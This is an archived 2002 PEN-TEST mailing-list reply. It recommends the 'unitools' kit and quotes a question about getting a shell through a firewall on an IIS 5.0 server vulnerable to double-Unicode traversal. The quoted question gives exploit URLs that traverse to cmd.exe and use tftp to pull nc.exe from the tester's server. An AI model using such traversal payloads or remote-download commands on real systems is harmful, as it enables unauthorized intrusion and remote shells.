RE: Can't get a shell

From: Rico Valdez (Rico.Valdezat_private)
Date: Thu Jul 11 2002 - 10:19:43 PDT

Next message: Jeanette LaRosa: "Re: escalating IUSR to admin rights via unicode and iis4"

Previous message: Rob Pope: "IIS Chunked Encoding Transfer Buffer Overflow Vulnerability"
Maybe in reply to: Gaziel, Avishay: "Can't get a shell"
Next in thread: Jeremy Junginger: "RE: Can't get a shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Find the unitools distribution. If the firewall is the issue, that should do the trick. The following link should help to get you going.

http://marc.theaimsgroup.com/?l=bugtraq&m=98040935006042&w=2

Good Luck!

Rico

> -----Original Message-----
> From: Gaziel, Avishay [mailto:agazielat_private]
> Sent: Tuesday, July 09, 2002 10:33 AM
> To: PEN-TESTat_private
> Subject: Can't get a shell
> 
> 
> Hi All,
> Situation:
> An  IIS5.0 vulnerable to unicode.("double Unicode" i.e. 
> ..%255c.. etc.)
> IIS sitting behind a firewall.
> Problem:
> host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-
> i+myserver+get
> +nc.exe doesn't work
> I keep getting (from my pumpkin tftp server) an error message 
> saying that
> there's something wrong with the variables.
> another strange thing is that even if I don't get the error 
> message the tftp
> session will not start and will timeout, if I deny access I 
> keep getting
> access requests from the IIS.(Pumpkin is configured to prompt 
> whenever a
> download/upload starts)
> What have I tried to do?
>  Use
> host/scripts/..%255c.........../winnt/system32/tftp.exe+-i+mys
erver+get+nc.e
> xe instead of the above mentioned...doesn't   work as well.
> What do I think is wrong?
> The FW is blocking all udp traffic out.
> What do I need?
> 1. Suggestions
> 2.Workarounds
> Avishay 
> 
> 
> 
> 
> 
> **************************************************************
> ***************
> The information in this email is confidential and may be 
> legally privileged.
> It is intended solely for the addressee. Access to this email 
> by anyone else
> is unauthorized. 
> 
> If you are not the intended recipient, any disclosure, 
> copying, distribution
> or any action taken or omitted to be taken in reliance on it, 
> is prohibited
> and may be unlawful. When addressed to our clients any 
> opinions or advice
> contained in this email are subject to the terms and 
> conditions expressed in
> the governing KPMG client engagement letter.         
> **************************************************************
> ***************
> 
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security 
> Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security 
> vulnerabilities please see:
> https://alerts.securityfocus.com/
> 
> 

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Jeanette LaRosa: "Re: escalating IUSR to admin rights via unicode and iis4"
Previous message: Rob Pope: "IIS Chunked Encoding Transfer Buffer Overflow Vulnerability"
Maybe in reply to: Gaziel, Avishay: "Can't get a shell"
Next in thread: Jeremy Junginger: "RE: Can't get a shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 11 2002 - 16:25:19 PDT